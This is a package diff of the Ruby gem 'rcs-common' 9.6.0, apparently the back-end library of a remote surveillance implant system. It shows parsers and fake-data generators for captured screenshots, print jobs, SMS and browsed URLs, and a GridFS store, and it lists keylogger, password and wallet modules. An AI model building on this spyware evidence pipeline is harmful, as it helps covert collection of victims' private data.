rcs-common 9.6.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +7 -0
- data/.gitignore +49 -0
- data/Gemfile +4 -0
- data/LICENSE.txt +1 -0
- data/Rakefile +27 -0
- data/lib/rcs-common.rb +21 -0
- data/lib/rcs-common/binary.rb +64 -0
- data/lib/rcs-common/cgi.rb +7 -0
- data/lib/rcs-common/component.rb +87 -0
- data/lib/rcs-common/crypt.rb +71 -0
- data/lib/rcs-common/deploy.rb +96 -0
- data/lib/rcs-common/diagnosticable.rb +136 -0
- data/lib/rcs-common/evidence.rb +261 -0
- data/lib/rcs-common/evidence/addressbook.rb +173 -0
- data/lib/rcs-common/evidence/application.rb +59 -0
- data/lib/rcs-common/evidence/calendar.rb +62 -0
- data/lib/rcs-common/evidence/call.rb +185 -0
- data/lib/rcs-common/evidence/camera.rb +25 -0
- data/lib/rcs-common/evidence/chat.rb +272 -0
- data/lib/rcs-common/evidence/clibpoard.rb +58 -0
- data/lib/rcs-common/evidence/command.rb +50 -0
- data/lib/rcs-common/evidence/common.rb +78 -0
- data/lib/rcs-common/evidence/content/camera/001.jpg +0 -0
- data/lib/rcs-common/evidence/content/coin/wallet_bit.dat +0 -0
- data/lib/rcs-common/evidence/content/coin/wallet_lite.dat +0 -0
- data/lib/rcs-common/evidence/content/file/Einstein.docx +0 -0
- data/lib/rcs-common/evidence/content/file/arabic.docx +0 -0
- data/lib/rcs-common/evidence/content/mouse/001.jpg +0 -0
- data/lib/rcs-common/evidence/content/mouse/002.jpg +0 -0
- data/lib/rcs-common/evidence/content/mouse/003.jpg +0 -0
- data/lib/rcs-common/evidence/content/mouse/004.jpg +0 -0
- data/lib/rcs-common/evidence/content/print/001.jpg +0 -0
- data/lib/rcs-common/evidence/content/screenshot/001.jpg +0 -0
- data/lib/rcs-common/evidence/content/screenshot/002.jpg +0 -0
- data/lib/rcs-common/evidence/content/screenshot/003.jpg +0 -0
- data/lib/rcs-common/evidence/content/url/001.jpg +0 -0
- data/lib/rcs-common/evidence/content/url/002.jpg +0 -0
- data/lib/rcs-common/evidence/content/url/003.jpg +0 -0
- data/lib/rcs-common/evidence/device.rb +23 -0
- data/lib/rcs-common/evidence/download.rb +54 -0
- data/lib/rcs-common/evidence/exec.rb +0 -0
- data/lib/rcs-common/evidence/file.rb +129 -0
- data/lib/rcs-common/evidence/filesystem.rb +71 -0
- data/lib/rcs-common/evidence/info.rb +24 -0
- data/lib/rcs-common/evidence/keylog.rb +84 -0
- data/lib/rcs-common/evidence/mail.rb +237 -0
- data/lib/rcs-common/evidence/mic.rb +39 -0
- data/lib/rcs-common/evidence/mms.rb +36 -0
- data/lib/rcs-common/evidence/money.rb +676 -0
- data/lib/rcs-common/evidence/mouse.rb +62 -0
- data/lib/rcs-common/evidence/password.rb +60 -0
- data/lib/rcs-common/evidence/photo.rb +80 -0
- data/lib/rcs-common/evidence/position.rb +303 -0
- data/lib/rcs-common/evidence/print.rb +50 -0
- data/lib/rcs-common/evidence/screenshot.rb +53 -0
- data/lib/rcs-common/evidence/sms.rb +91 -0
- data/lib/rcs-common/evidence/url.rb +133 -0
- data/lib/rcs-common/fixnum.rb +48 -0
- data/lib/rcs-common/gridfs.rb +294 -0
- data/lib/rcs-common/heartbeat.rb +96 -0
- data/lib/rcs-common/keywords.rb +50 -0
- data/lib/rcs-common/mime.rb +65 -0
- data/lib/rcs-common/mongoid.rb +19 -0
- data/lib/rcs-common/pascalize.rb +62 -0
- data/lib/rcs-common/path_utils.rb +67 -0
- data/lib/rcs-common/resolver.rb +40 -0
- data/lib/rcs-common/rest.rb +17 -0
- data/lib/rcs-common/sanitize.rb +42 -0
- data/lib/rcs-common/serializer.rb +404 -0
- data/lib/rcs-common/signature.rb +141 -0
- data/lib/rcs-common/stats.rb +94 -0
- data/lib/rcs-common/symbolize.rb +10 -0
- data/lib/rcs-common/systemstatus.rb +136 -0
- data/lib/rcs-common/temporary.rb +13 -0
- data/lib/rcs-common/time.rb +24 -0
- data/lib/rcs-common/trace.rb +138 -0
- data/lib/rcs-common/trace.yaml +42 -0
- data/lib/rcs-common/updater/client.rb +354 -0
- data/lib/rcs-common/updater/dsl.rb +178 -0
- data/lib/rcs-common/updater/payload.rb +79 -0
- data/lib/rcs-common/updater/server.rb +126 -0
- data/lib/rcs-common/updater/shared_key.rb +55 -0
- data/lib/rcs-common/updater/tmp_dir.rb +13 -0
- data/lib/rcs-common/utf16le.rb +83 -0
- data/lib/rcs-common/version.rb +5 -0
- data/lib/rcs-common/winfirewall.rb +235 -0
- data/rcs-common.gemspec +64 -0
- data/spec/gridfs_spec.rb +637 -0
- data/spec/mongoid.yaml +6 -0
- data/spec/signature_spec.rb +105 -0
- data/spec/spec_helper.rb +22 -0
- data/spec/updater_spec.rb +80 -0
- data/tasks/deploy.rake +21 -0
- data/tasks/protect.rake +90 -0
- data/test/helper.rb +17 -0
- data/test/test_binary.rb +107 -0
- data/test/test_cgi.rb +14 -0
- data/test/test_crypt.rb +125 -0
- data/test/test_evidence.rb +52 -0
- data/test/test_evidence_manager.rb +119 -0
- data/test/test_fixnum.rb +35 -0
- data/test/test_keywords.rb +137 -0
- data/test/test_mime.rb +49 -0
- data/test/test_pascalize.rb +100 -0
- data/test/test_path_utils.rb +24 -0
- data/test/test_rcs-common.rb +7 -0
- data/test/test_sanitize.rb +40 -0
- data/test/test_serialization.rb +20 -0
- data/test/test_stats.rb +90 -0
- data/test/test_symbolize.rb +20 -0
- data/test/test_systemstatus.rb +35 -0
- data/test/test_time.rb +56 -0
- data/test/test_trace.rb +25 -0
- data/test/test_utf16le.rb +71 -0
- data/test/test_winfirewall.rb +68 -0
- metadata +423 -0
@@ -0,0 +1,50 @@
|
|
1
|
+
require 'rcs-common/evidence/common'
|
2
|
+
|
3
|
+
module RCS
|
4
|
+
|
5
|
+
module PrintEvidence
|
6
|
+
|
7
|
+
PRINT_VERSION = 2009031201
|
8
|
+
|
9
|
+
def content
|
10
|
+
path = File.join(File.dirname(__FILE__), 'content', 'print', '001.jpg')
|
11
|
+
File.open(path, 'rb') {|f| f.read }
|
12
|
+
end
|
13
|
+
|
14
|
+
def generate_content
|
15
|
+
[ content ]
|
16
|
+
end
|
17
|
+
|
18
|
+
def additional_header
|
19
|
+
name = 'ASP_Common.h'.to_utf16le_binary
|
20
|
+
header = StringIO.new
|
21
|
+
header.write [PRINT_VERSION, name.size].pack("I*")
|
22
|
+
header.write name
|
23
|
+
|
24
|
+
header.string
|
25
|
+
end
|
26
|
+
|
27
|
+
def decode_additional_header(data)
|
28
|
+
raise EvidenceDeserializeError.new("incomplete PRINT") if data.nil? or data.bytesize == 0
|
29
|
+
|
30
|
+
binary = StringIO.new data
|
31
|
+
|
32
|
+
version, name_len = binary.read(8).unpack("I*")
|
33
|
+
raise EvidenceDeserializeError.new("invalid log version for PRINT") unless version == PRINT_VERSION
|
34
|
+
|
35
|
+
ret = Hash.new
|
36
|
+
ret[:data] = Hash.new
|
37
|
+
ret[:data][:spool] = binary.read(name_len).utf16le_to_utf8
|
38
|
+
return ret
|
39
|
+
end
|
40
|
+
|
41
|
+
def decode_content(common_info, chunks)
|
42
|
+
info = Hash[common_info]
|
43
|
+
info[:data] ||= Hash.new
|
44
|
+
info[:grid_content] = chunks.first
|
45
|
+
yield info if block_given?
|
46
|
+
:delete_raw
|
47
|
+
end
|
48
|
+
end
|
49
|
+
|
50
|
+
end # ::RCS
|
@@ -0,0 +1,53 @@
|
|
1
|
+
require 'rcs-common/evidence/common'
|
2
|
+
|
3
|
+
module RCS
|
4
|
+
|
5
|
+
module ScreenshotEvidence
|
6
|
+
|
7
|
+
SCREENSHOT_VERSION = 2009031201
|
8
|
+
|
9
|
+
def content
|
10
|
+
path = File.join(File.dirname(__FILE__), 'content', 'screenshot', '00' + (rand(3) + 1).to_s + '.jpg')
|
11
|
+
File.open(path, 'rb') {|f| f.read }
|
12
|
+
end
|
13
|
+
|
14
|
+
def generate_content
|
15
|
+
[ content ]
|
16
|
+
end
|
17
|
+
|
18
|
+
def additional_header
|
19
|
+
process_name = 'ruby'.to_utf16le_binary
|
20
|
+
window_name = 'Ruby Backdoor!'.to_utf16le_binary
|
21
|
+
header = StringIO.new
|
22
|
+
header.write [SCREENSHOT_VERSION, process_name.size, window_name.size].pack("I*")
|
23
|
+
header.write process_name
|
24
|
+
header.write window_name
|
25
|
+
|
26
|
+
header.string
|
27
|
+
end
|
28
|
+
|
29
|
+
def decode_additional_header(data)
|
30
|
+
raise EvidenceDeserializeError.new("incomplete SCREENSHOT") if data.nil? or data.bytesize == 0
|
31
|
+
|
32
|
+
binary = StringIO.new data
|
33
|
+
|
34
|
+
version, process_name_len, window_name_len = binary.read(12).unpack("I*")
|
35
|
+
raise EvidenceDeserializeError.new("invalid log version for SCREENSHOT") unless version == SCREENSHOT_VERSION
|
36
|
+
|
37
|
+
ret = Hash.new
|
38
|
+
ret[:data] = Hash.new
|
39
|
+
ret[:data][:program] = binary.read(process_name_len).utf16le_to_utf8
|
40
|
+
ret[:data][:window] = binary.read(window_name_len).utf16le_to_utf8
|
41
|
+
return ret
|
42
|
+
end
|
43
|
+
|
44
|
+
def decode_content(common_info, chunks)
|
45
|
+
info = Hash[common_info]
|
46
|
+
info[:data] ||= Hash.new
|
47
|
+
info[:grid_content] = chunks.join
|
48
|
+
yield info if block_given?
|
49
|
+
:delete_raw
|
50
|
+
end
|
51
|
+
end
|
52
|
+
|
53
|
+
end # ::RCS
|
@@ -0,0 +1,91 @@
|
|
1
|
+
require_relative 'common'
|
2
|
+
require 'rcs-common/serializer'
|
3
|
+
|
4
|
+
module RCS
|
5
|
+
|
6
|
+
module SmsoldEvidence
|
7
|
+
def content
|
8
|
+
raise "Not implemented!"
|
9
|
+
end
|
10
|
+
|
11
|
+
def generate_content
|
12
|
+
raise "Not implemented!"
|
13
|
+
end
|
14
|
+
|
15
|
+
def decode_content(common_info, chunks)
|
16
|
+
|
17
|
+
info = Hash[common_info]
|
18
|
+
info[:data] ||= Hash.new
|
19
|
+
info[:data][:type] = :sms
|
20
|
+
|
21
|
+
stream = StringIO.new chunks.join
|
22
|
+
@sms = MAPISerializer.new.unserialize stream
|
23
|
+
|
24
|
+
info[:da] = @sms.delivery_time
|
25
|
+
info[:data][:from] = @sms.fields[:from].delete("\x00")
|
26
|
+
info[:data][:rcpt] = @sms.fields[:rcpt].delete("\x00")
|
27
|
+
info[:data][:content] = @sms.fields[:subject]
|
28
|
+
info[:data][:incoming] = @sms.flags
|
29
|
+
|
30
|
+
yield info if block_given?
|
31
|
+
:keep_raw
|
32
|
+
end
|
33
|
+
end # ::SmsoldEvidence
|
34
|
+
|
35
|
+
module SmsEvidence
|
36
|
+
|
37
|
+
SMS_VERSION = 2010050501
|
38
|
+
|
39
|
+
def content
|
40
|
+
"test sms".to_utf16le_binary_null
|
41
|
+
end
|
42
|
+
|
43
|
+
def generate_content
|
44
|
+
[ content ]
|
45
|
+
end
|
46
|
+
|
47
|
+
def additional_header
|
48
|
+
header = StringIO.new
|
49
|
+
header.write [SMS_VERSION].pack("l")
|
50
|
+
header.write [[0,1].sample].pack("l") # incoming
|
51
|
+
time = Time.now.getutc.to_filetime
|
52
|
+
header.write time.pack('L*')
|
53
|
+
header.write "+39123456789".ljust(16, "\x00")
|
54
|
+
header.write "+39987654321".ljust(16, "\x00")
|
55
|
+
header.string
|
56
|
+
end
|
57
|
+
|
58
|
+
def decode_additional_header(data)
|
59
|
+
binary = StringIO.new data
|
60
|
+
|
61
|
+
version = binary.read(4).unpack('l').first
|
62
|
+
raise EvidenceDeserializeError.new("invalid log version for SMS") unless version == SMS_VERSION
|
63
|
+
|
64
|
+
ret = Hash.new
|
65
|
+
ret[:data] = Hash.new
|
66
|
+
|
67
|
+
ret[:data][:incoming] = binary.read(4).unpack('l').first
|
68
|
+
low, high = binary.read(8).unpack('L2')
|
69
|
+
# ignore this time value, it's the same as the acquired in the common header
|
70
|
+
# Time.from_filetime high, low
|
71
|
+
ret[:data][:from] = binary.read(16).delete("\x00")
|
72
|
+
ret[:data][:rcpt] = binary.read(16).delete("\x00")
|
73
|
+
|
74
|
+
return ret
|
75
|
+
end
|
76
|
+
|
77
|
+
def decode_content(common_info, chunks)
|
78
|
+
info = Hash[common_info]
|
79
|
+
info[:data] ||= Hash.new
|
80
|
+
info[:data][:type] = :sms
|
81
|
+
|
82
|
+
stream = StringIO.new chunks.join
|
83
|
+
|
84
|
+
info[:data][:content] = stream.read.utf16le_to_utf8
|
85
|
+
|
86
|
+
yield info if block_given?
|
87
|
+
:delete_raw
|
88
|
+
end
|
89
|
+
end # ::SmsEvidence
|
90
|
+
|
91
|
+
end # ::RCS
|
@@ -0,0 +1,133 @@
|
|
1
|
+
require 'rcs-common/evidence/common'
|
2
|
+
|
3
|
+
require 'CGI'
|
4
|
+
|
5
|
+
module RCS
|
6
|
+
|
7
|
+
module UrlEvidence
|
8
|
+
|
9
|
+
VERSION_DELIMITER = 0x20100713
|
10
|
+
ELEM_DELIMITER = 0xABADC0DE
|
11
|
+
BROWSER_TYPE = ['Unknown', 'Internet Explorer', 'Firefox', 'Opera', 'Safari', 'Chrome', 'Mobile Safari', 'Browser', 'Web']
|
12
|
+
|
13
|
+
def decode_query(url)
|
14
|
+
query = []
|
15
|
+
query = url.scan(/(?:&?|^)q=([^&]*)(?:&|$)/).first if url['google']
|
16
|
+
query = url.scan(/(?:&?|^)p=([^&]*)(?:&|$)/).first if url['yahoo']
|
17
|
+
query = url.scan(/(?:&?|^)q=([^&]*)(?:&|$)/).first if url['bing']
|
18
|
+
|
19
|
+
return CGI::unescape query.first unless query.nil? or query.empty?
|
20
|
+
return ''
|
21
|
+
end
|
22
|
+
|
23
|
+
def content
|
24
|
+
browser = [1, 2, 3, 4, 5, 6].sample
|
25
|
+
r = rand(4)
|
26
|
+
url = ["http://www.google.it/#hl=it&source=hp&q=pippo+baudo&aq=f&aqi=g10&aql=&oq=&gs_rfai=&fp=67a9a41ace8bb1ed", "http://reader.google.com", "https://www.facebook.com", "www.stackoverflow.com"][r].to_utf16le_binary_null
|
27
|
+
window = ["Google Search", "Google Reader", "Facebook", "Stackoverflow"][r].to_utf16le_binary_null
|
28
|
+
|
29
|
+
content = StringIO.new
|
30
|
+
t = Time.now.getutc
|
31
|
+
content.write [t.sec, t.min, t.hour, t.mday, t.mon, t.year, t.wday, t.yday, t.isdst ? 0 : 1].pack('l*')
|
32
|
+
content.write [ VERSION_DELIMITER ].pack('L')
|
33
|
+
content.write url
|
34
|
+
content.write [ browser ].pack('L')
|
35
|
+
content.write window
|
36
|
+
content.write [ ELEM_DELIMITER ].pack('L')
|
37
|
+
|
38
|
+
content.string
|
39
|
+
end
|
40
|
+
|
41
|
+
def generate_content
|
42
|
+
ret = Array.new
|
43
|
+
10.rand_times { ret << content() }
|
44
|
+
ret
|
45
|
+
end
|
46
|
+
|
47
|
+
def decode_content(common_info, chunks)
|
48
|
+
stream = StringIO.new chunks.join
|
49
|
+
|
50
|
+
until stream.eof?
|
51
|
+
info = Hash[common_info]
|
52
|
+
info[:data] = Hash.new if info[:data].nil?
|
53
|
+
|
54
|
+
tm = stream.read 36
|
55
|
+
info[:da] = Time.gm(*tm.unpack('L*'), 0)
|
56
|
+
info[:data][:url] = ''
|
57
|
+
info[:data][:title] = ''
|
58
|
+
|
59
|
+
delim = stream.read(4).unpack('L').first
|
60
|
+
raise EvidenceDeserializeError.new("Malformed evidence (invalid URL version)") unless delim == VERSION_DELIMITER
|
61
|
+
|
62
|
+
url = stream.read_utf16le_string
|
63
|
+
info[:data][:url] = url.utf16le_to_utf8 unless url.nil?
|
64
|
+
browser = stream.read(4).unpack('L').first
|
65
|
+
info[:data][:program] = BROWSER_TYPE[browser]
|
66
|
+
window = stream.read_utf16le_string
|
67
|
+
info[:data][:title] = window.utf16le_to_utf8 unless window.nil?
|
68
|
+
info[:data][:keywords] = decode_query info[:data][:url]
|
69
|
+
|
70
|
+
delim = stream.read(4).unpack('L').first
|
71
|
+
raise EvidenceDeserializeError.new("Malformed URL (missing delimiter)") unless delim == ELEM_DELIMITER
|
72
|
+
|
73
|
+
yield info if block_given?
|
74
|
+
:delete_raw
|
75
|
+
end
|
76
|
+
end
|
77
|
+
|
78
|
+
end
|
79
|
+
|
80
|
+
module UrlcaptureEvidence
|
81
|
+
include UrlEvidence
|
82
|
+
|
83
|
+
URL_VERSION = 2010071301
|
84
|
+
|
85
|
+
def content
|
86
|
+
path = File.join(File.dirname(__FILE__), 'content', 'url', '00' + (rand(3) + 1).to_s + '.jpg')
|
87
|
+
File.open(path, 'rb') {|f| f.read }
|
88
|
+
end
|
89
|
+
|
90
|
+
def generate_content
|
91
|
+
[ content ]
|
92
|
+
end
|
93
|
+
|
94
|
+
def additional_header
|
95
|
+
browser = [1, 2, 3, 4, 5, 6].sample
|
96
|
+
r = rand(3)
|
97
|
+
url = ['http://reader.google.com', 'https://www.facebook.com', 'http://www.stackoverflow.com'][r].to_utf16le_binary
|
98
|
+
window = ['Google', 'Facebook', 'Stackoverflow'][r].to_utf16le_binary
|
99
|
+
header = StringIO.new
|
100
|
+
header.write [URL_VERSION, browser, url.size, window.size].pack("I*")
|
101
|
+
header.write url
|
102
|
+
header.write window
|
103
|
+
|
104
|
+
header.string
|
105
|
+
end
|
106
|
+
|
107
|
+
def decode_additional_header(data)
|
108
|
+
raise EvidenceDeserializeError.new("incomplete URLCAPTURE") if data.nil? or data.bytesize == 0
|
109
|
+
|
110
|
+
binary = StringIO.new data
|
111
|
+
|
112
|
+
version, browser, url_len, window_len = binary.read(16).unpack("I*")
|
113
|
+
raise EvidenceDeserializeError.new("invalid log version for URLCAPTURE") unless version == URL_VERSION
|
114
|
+
|
115
|
+
ret = Hash.new
|
116
|
+
ret[:data] = Hash.new
|
117
|
+
ret[:data][:program] = BROWSER_TYPE[browser]
|
118
|
+
ret[:data][:url] = binary.read(url_len).utf16le_to_utf8
|
119
|
+
ret[:data][:title] = binary.read(window_len).utf16le_to_utf8
|
120
|
+
ret[:data][:keywords] = decode_query ret[:data][:url]
|
121
|
+
return ret
|
122
|
+
end
|
123
|
+
|
124
|
+
def decode_content(common_info, chunks)
|
125
|
+
info = Hash[common_info]
|
126
|
+
info[:data] ||= Hash.new
|
127
|
+
info[:grid_content] = chunks.join
|
128
|
+
yield info if block_given?
|
129
|
+
:delete_raw
|
130
|
+
end
|
131
|
+
end
|
132
|
+
|
133
|
+
end # ::RCS
|
@@ -0,0 +1,48 @@
|
|
1
|
+
|
2
|
+
module ByteSize
|
3
|
+
|
4
|
+
KiB = 2**10
|
5
|
+
MiB = 2**20
|
6
|
+
GiB = 2**30
|
7
|
+
TiB = 2**40
|
8
|
+
|
9
|
+
KB = 10**3
|
10
|
+
MB = 10**6
|
11
|
+
GB = 10**9
|
12
|
+
TB = 10**12
|
13
|
+
|
14
|
+
# return the size in a human readable format
|
15
|
+
def to_s_bytes(base = 2)
|
16
|
+
|
17
|
+
base_two = {TiB => 'TiB', GiB => 'GiB', MiB => 'MiB', KiB => 'KiB'}
|
18
|
+
base_ten = {TB => 'TB', GB => 'GB', MB => 'MB', KB => 'kB'}
|
19
|
+
|
20
|
+
values = base_two if base == 2
|
21
|
+
values = base_ten if base == 10
|
22
|
+
|
23
|
+
values.each_pair do |k, v|
|
24
|
+
if self >= k
|
25
|
+
return (self.to_f / k).round(2).to_s + ' ' + v
|
26
|
+
end
|
27
|
+
end
|
28
|
+
|
29
|
+
# case when is under KiB
|
30
|
+
return self.to_s + ' B'
|
31
|
+
|
32
|
+
end
|
33
|
+
|
34
|
+
end
|
35
|
+
|
36
|
+
class Fixnum
|
37
|
+
include ByteSize
|
38
|
+
end
|
39
|
+
|
40
|
+
class Float
|
41
|
+
include ByteSize
|
42
|
+
end
|
43
|
+
|
44
|
+
# we need to add it even to Bignum for windows32 compatibility
|
45
|
+
# everything over a GiB is Bignum...
|
46
|
+
class Bignum
|
47
|
+
include ByteSize
|
48
|
+
end
|
@@ -0,0 +1,294 @@
|
|
1
|
+
require 'digest/md5'
|
2
|
+
require 'rcs-common/mongoid'
|
3
|
+
|
4
|
+
module RCS
|
5
|
+
module Common
|
6
|
+
module GridFS
|
7
|
+
BSON = Moped::BSON if Mongoid::VERSION < '4.0.0'
|
8
|
+
|
9
|
+
class ReadOnlyFile
|
10
|
+
attr_reader :attributes, :bucket, :file_position
|
11
|
+
|
12
|
+
def initialize(bucket, attributes)
|
13
|
+
@attributes = attributes
|
14
|
+
@bucket = bucket
|
15
|
+
@last_chunk_num = (@attributes[:length].to_f / @attributes[:chunk_size]).ceil - 1
|
16
|
+
rewind
|
17
|
+
end
|
18
|
+
|
19
|
+
def method_missing(name)
|
20
|
+
raise NoMethodError.new(name.inspect) unless @attributes.has_key?(name)
|
21
|
+
@attributes[name]
|
22
|
+
end
|
23
|
+
|
24
|
+
def read(bytes_to_read = nil)
|
25
|
+
data = ''
|
26
|
+
|
27
|
+
return data if @file_position >= @attributes[:length]
|
28
|
+
return data if bytes_to_read and bytes_to_read <= 0
|
29
|
+
|
30
|
+
if @current_chunk[:n]
|
31
|
+
chunk_size = @attributes[:chunk_size]
|
32
|
+
offset = @file_position % chunk_size
|
33
|
+
offset = chunk_size if offset == 0
|
34
|
+
data = @current_chunk[:data][offset..-1] || ''
|
35
|
+
end
|
36
|
+
|
37
|
+
if bytes_to_read.nil? or bytes_to_read > data.bytesize
|
38
|
+
loop do
|
39
|
+
break unless read_next_chunk
|
40
|
+
data << @current_chunk[:data]
|
41
|
+
|
42
|
+
break if bytes_to_read and bytes_to_read <= data.bytesize
|
43
|
+
end
|
44
|
+
end
|
45
|
+
|
46
|
+
bytes_to_read = bytes_to_read ? bytes_to_read - 1 : -1
|
47
|
+
data = data[0..bytes_to_read]
|
48
|
+
@file_position += data.bytesize
|
49
|
+
data
|
50
|
+
end
|
51
|
+
|
52
|
+
def rewind
|
53
|
+
@current_chunk = {n: nil, data: nil}
|
54
|
+
@file_position = 0
|
55
|
+
end
|
56
|
+
|
57
|
+
def eof?
|
58
|
+
@file_position >= @attributes[:length]
|
59
|
+
end
|
60
|
+
|
61
|
+
def id
|
62
|
+
@attributes[:_id]
|
63
|
+
end
|
64
|
+
|
65
|
+
def file_length
|
66
|
+
@attributes[:length]
|
67
|
+
end
|
68
|
+
|
69
|
+
alias :content :read
|
70
|
+
alias :tell :file_position
|
71
|
+
alias :position :file_position
|
72
|
+
alias :pos :file_position
|
73
|
+
|
74
|
+
private
|
75
|
+
|
76
|
+
def read_next_chunk
|
77
|
+
chunk_num = @current_chunk[:n] ? @current_chunk[:n] + 1 : 0
|
78
|
+
return nil if chunk_num == @last_chunk_num + 1
|
79
|
+
|
80
|
+
chunk = bucket.chunks_collection.find(files_id: @attributes[:_id], n: chunk_num).first
|
81
|
+
# chunk maybe nil in case of corrupted data
|
82
|
+
# e.g.: declared length different than the actual length
|
83
|
+
return nil unless chunk
|
84
|
+
|
85
|
+
@current_chunk = {n: chunk['n'], data: chunk['data'].data}
|
86
|
+
end
|
87
|
+
end
|
88
|
+
|
89
|
+
class Bucket
|
90
|
+
attr_reader :name, :mongoid_session_name
|
91
|
+
|
92
|
+
DEFAULT_NAME = 'fs'
|
93
|
+
DEFAULT_CONTENT_TYPE = 'application/octet-stream'
|
94
|
+
DEFAULT_CHUNK_SIZE = 262144
|
95
|
+
BINARY_ENCODING = 'BINARY'
|
96
|
+
|
97
|
+
def initialize(name = DEFAULT_NAME, options = {})
|
98
|
+
@name = name.to_s.downcase.strip
|
99
|
+
@name = DEFAULT_NAME if @name.empty?
|
100
|
+
@mongoid_session_name = options[:mongoid_session_name] || :default
|
101
|
+
@setup_on_write = options[:lazy].nil? ? true : options[:lazy]
|
102
|
+
@osx = RbConfig::CONFIG['host_os'] =~ /darwin/
|
103
|
+
|
104
|
+
setup unless @setup_on_write
|
105
|
+
end
|
106
|
+
|
107
|
+
def session_options
|
108
|
+
# Allow unsafe write on OSX.
|
109
|
+
# @see https://github.com/mongoid/mongoid/issues/3582
|
110
|
+
|
111
|
+
@osx ? {safe: false} : {}
|
112
|
+
end
|
113
|
+
|
114
|
+
def session
|
115
|
+
Mongoid.session(mongoid_session_name).with(session_options)
|
116
|
+
end
|
117
|
+
|
118
|
+
def files_collection
|
119
|
+
session[:"#{name}.files"]
|
120
|
+
end
|
121
|
+
|
122
|
+
def chunks_collection
|
123
|
+
session[:"#{name}.chunks"]
|
124
|
+
end
|
125
|
+
|
126
|
+
def put(content, attrs = {}, options = {})
|
127
|
+
return if content.nil?
|
128
|
+
|
129
|
+
file = {}
|
130
|
+
|
131
|
+
file[:_id] = BSON::ObjectId.new
|
132
|
+
file[:length] = content.bytesize
|
133
|
+
file[:chunkSize] = DEFAULT_CHUNK_SIZE
|
134
|
+
|
135
|
+
return if file[:length].zero?
|
136
|
+
|
137
|
+
file[:filename] = attrs[:filename]
|
138
|
+
file[:contentType] = attrs[:content_type] || attrs[:contentType] || DEFAULT_CONTENT_TYPE
|
139
|
+
file[:aliases] = attrs[:aliases] || []
|
140
|
+
file[:aliases] = [file[:aliases]].flatten
|
141
|
+
file[:metadata] = attrs[:metadata] || {}
|
142
|
+
file[:metadata] = {} if file[:metadata].blank?
|
143
|
+
file[:uploadDate] = attrs[:upload_date] || attrs[:uploadDate] || Time.now.utc
|
144
|
+
|
145
|
+
file[:md5] = write(file[:_id], content, options)
|
146
|
+
|
147
|
+
files_collection.insert(file)
|
148
|
+
|
149
|
+
file[:_id]
|
150
|
+
end
|
151
|
+
|
152
|
+
def md5(file_id)
|
153
|
+
doc = session.command(filemd5: file_id, root: name)
|
154
|
+
doc['md5'] if doc.respond_to?(:[])
|
155
|
+
end
|
156
|
+
|
157
|
+
def append(file_id, data, options = {})
|
158
|
+
attributes = if options[:filename]
|
159
|
+
files_collection.find(filename: file_id).first
|
160
|
+
else
|
161
|
+
file_id = objectid(file_id)
|
162
|
+
files_collection.find(_id: file_id).first
|
163
|
+
end
|
164
|
+
|
165
|
+
if !attributes and options[:create]
|
166
|
+
file_attributes = options[:create].respond_to?(:[]) ? options[:create] : {}
|
167
|
+
new_file_id = put(data, file_attributes, options)
|
168
|
+
return [new_file_id, data.bytesize]
|
169
|
+
end
|
170
|
+
|
171
|
+
raise("File not found: #{file_id}") unless attributes
|
172
|
+
|
173
|
+
attributes = attributes.to_h.symbolize_keys
|
174
|
+
|
175
|
+
file_id = objectid(attributes[:_id])
|
176
|
+
|
177
|
+
length, chunk_size = attributes[:length], attributes[:chunkSize]
|
178
|
+
|
179
|
+
chunk_offset = (length / chunk_size).to_i
|
180
|
+
offset = length % chunk_size
|
181
|
+
|
182
|
+
if offset > 0
|
183
|
+
data = chunks_collection.find(files_id: file_id, n: chunk_offset).first['data'].data + data
|
184
|
+
end
|
185
|
+
|
186
|
+
chunkerize(data) do |chunk_data, chunk_num|
|
187
|
+
chunks_collection.find(files_id: file_id, n: chunk_num + chunk_offset).upsert('$set' => {data: binary(chunk_data)})
|
188
|
+
end
|
189
|
+
|
190
|
+
new_md5 = md5(file_id) if options[:md5] != false
|
191
|
+
new_length = length - offset + data.bytesize
|
192
|
+
|
193
|
+
files_collection.find(_id: file_id).update('$set' => {length: new_length, md5: new_md5})
|
194
|
+
|
195
|
+
[file_id, new_length]
|
196
|
+
end
|
197
|
+
|
198
|
+
# Equivalent to #get(id).read
|
199
|
+
def content(file_id)
|
200
|
+
file_id = objectid(file_id)
|
201
|
+
|
202
|
+
chunks_collection.find(files_id: file_id, n: {'$gte' => 0}).inject("") do |data, chunk|
|
203
|
+
data << chunk['data'].data
|
204
|
+
end
|
205
|
+
end
|
206
|
+
|
207
|
+
def get(file_id, options = {})
|
208
|
+
file_id = objectid(file_id)
|
209
|
+
attributes = files_collection.find(_id: file_id).first
|
210
|
+
|
211
|
+
return unless attributes
|
212
|
+
|
213
|
+
attributes = attributes.to_h.symbolize_keys
|
214
|
+
attributes[:bucket] = self
|
215
|
+
attributes[:chunk_size] = attributes[:chunkSize]
|
216
|
+
attributes[:content_type] = attributes[:contentType]
|
217
|
+
attributes[:upload_date] = attributes[:uploadDate]
|
218
|
+
|
219
|
+
ReadOnlyFile.new(self, attributes)
|
220
|
+
end
|
221
|
+
|
222
|
+
def delete(file_id)
|
223
|
+
file_id = objectid(file_id)
|
224
|
+
|
225
|
+
files_collection.find(_id: file_id).remove
|
226
|
+
chunks_collection.find(files_id: file_id).remove_all
|
227
|
+
|
228
|
+
return nil
|
229
|
+
end
|
230
|
+
|
231
|
+
def drop
|
232
|
+
[files_collection, chunks_collection].map(&:drop)
|
233
|
+
@setup_on_write = true
|
234
|
+
end
|
235
|
+
|
236
|
+
alias :remove :delete
|
237
|
+
|
238
|
+
private
|
239
|
+
|
240
|
+
def objectid(id)
|
241
|
+
id.respond_to?(:generation_time) ? id : BSON::ObjectId.from_string(id.to_s)
|
242
|
+
end
|
243
|
+
|
244
|
+
def setup
|
245
|
+
chunks_collection.indexes.create({files_id: 1, n: 1}, {unique: true})
|
246
|
+
# This is an optional index (not required by the gridfs specs)
|
247
|
+
files_collection.indexes.create({filename: 1}, {background: true})
|
248
|
+
nil
|
249
|
+
end
|
250
|
+
|
251
|
+
def chunkerize(data)
|
252
|
+
offset = 0
|
253
|
+
chunk_num = 0
|
254
|
+
|
255
|
+
loop do
|
256
|
+
chunk_data = data.byteslice(offset..(offset + DEFAULT_CHUNK_SIZE - 1))
|
257
|
+
break if chunk_data.nil?
|
258
|
+
chunk_data_size = chunk_data.bytesize
|
259
|
+
offset += chunk_data_size
|
260
|
+
break if chunk_data_size == 0
|
261
|
+
yield(chunk_data, chunk_num)
|
262
|
+
